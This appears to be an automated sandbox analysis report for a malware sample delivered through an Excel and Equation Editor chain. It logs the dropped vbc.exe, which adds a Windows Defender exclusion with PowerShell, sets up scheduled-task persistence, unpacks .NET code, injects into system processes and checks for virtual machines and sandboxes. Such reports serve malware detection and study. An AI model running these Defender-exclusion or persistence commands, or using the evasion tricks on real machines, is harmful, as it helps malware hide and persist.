Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nLOlOTZpUHFzC" /XML "C:\Users\user\AppData\Local\Temp\tmp5580.tmp
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nLOlOTZpUHFzC" /XML "C:\Users\user\AppData\Local\Temp\tmp5580.tmp	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD029.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Users\Public\vbc.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver

Source: vbc.exe	String found in binary or memory: /SecurityExcepti;component/views/addbook.xaml
Source: vbc.exe	String found in binary or memory: views/addcustomer.baml
Source: vbc.exe	String found in binary or memory: views/addbook.baml
Source: vbc.exe	String found in binary or memory: /SecurityExcepti;component/views/addcustomer.xaml
Source: vbc.exe	String found in binary or memory: /SecurityExcepti;component/views/addbook.xaml
Source: vbc.exe	String found in binary or memory: views/addcustomer.baml
Source: vbc.exe	String found in binary or memory: views/addbook.baml
Source: vbc.exe	String found in binary or memory: /SecurityExcepti;component/views/addcustomer.xaml

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000009.00000003.462674322.0000000000910000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.461677984.00000000007B0000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.495648156.0000000000DC0000.00000040.00000001.sdmp, vbc.exe, 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, svchost.exe, 0000000C.00000003.495116287.00000000002A0000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.495983916.00000000004E0000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.661157510.0000000000BA0000.00000040.00000001.sdmp
Source:	Binary string: svchost.pdb source: vbc.exe, 00000009.00000002.495309971.00000000006D9000.00000004.00000020.sdmp, vbc.exe, 00000009.00000002.495142826.0000000000030000.00000040.00020000.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: vbc[1].exe.2.dr, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: vbc.exe.2.dr, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: nLOlOTZpUHFzC.exe.4.dr, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.vbc.exe.bb0000.1.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.vbc.exe.bb0000.0.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.2.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.8.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.6.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.4.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.0.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.10.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.1.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.2.vbc.exe.bb0000.3.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.3.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00BB92F5 push ds; ret	4_2_00BB9340
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00BB9361 push ds; retf	4_2_00BB9364
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00BB9347 push ds; ret	4_2_00BB934C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041B832 push eax; ret	9_2_0041B838
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041B83B push eax; ret	9_2_0041B8A2
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041B89C push eax; ret	9_2_0041B8A2
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00406907 push 00000060h; retf	9_2_0040691C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041A11B push ecx; ret	9_2_0041A11C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041A3BA pushfd ; ret	9_2_0041A3BB
Source: C:\Users\Public\vbc.exe	Code function: 9_2_004154EE pushad ; retf	9_2_004154F0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00419E43 push 0000007Eh; iretd	9_2_00419E45
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0040EFC6 push cs; ret	9_2_0040EFCC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041B7E5 push eax; ret	9_2_0041B838
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00BB92F5 push ds; ret	9_2_00BB9340
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00BB9361 push ds; retf	9_2_00BB9364
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00BB9347 push ds; ret	9_2_00BB934C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A3DFA1 push ecx; ret	12_2_00A3DFB4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_0009A11B push ecx; ret	12_2_0009A11C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_0009A3BA pushfd ; ret	12_2_0009A3BB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_000954EE pushad ; retf	12_2_000954F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_0009B7E5 push eax; ret	12_2_0009B838
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_0009B83B push eax; ret	12_2_0009B8A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_0009B832 push eax; ret	12_2_0009B838
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_0009B89C push eax; ret	12_2_0009B8A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00086907 push 00000060h; retf	12_2_0008691C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00099E43 push 0000007Eh; iretd	12_2_00099E45
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_0008EFC6 push cs; ret	12_2_0008EFCC

Source: initial sample	Static PE information: section name: .text entropy: 7.85477133341
Source: initial sample	Static PE information: section name: .text entropy: 7.85477133341
Source: initial sample	Static PE information: section name: .text entropy: 7.85477133341

Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\Public\vbc.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nLOlOTZpUHFzC" /XML "C:\Users\user\AppData\Local\Temp\tmp5580.tmp

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 4.2.vbc.exe.228f148.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.22fc90c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.463350952.000000000223F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2224, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000004.00000002.463350952.000000000223F000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.463350952.000000000223F000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 000000000008899E second address: 00000000000889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2788	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 760	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 760	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 760	Thread sleep time: -450000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2520	Thread sleep count: 4470 > 30	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2520	Thread sleep count: 348 > 30	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1940	Thread sleep time: -37113s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 772	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2520	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2080	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 1496	Thread sleep time: -34000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\Public\vbc.exe

Window / User API: threadDelayed 4470

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 9_2_004088D0 rdtsc

9_2_004088D0

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 37113	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
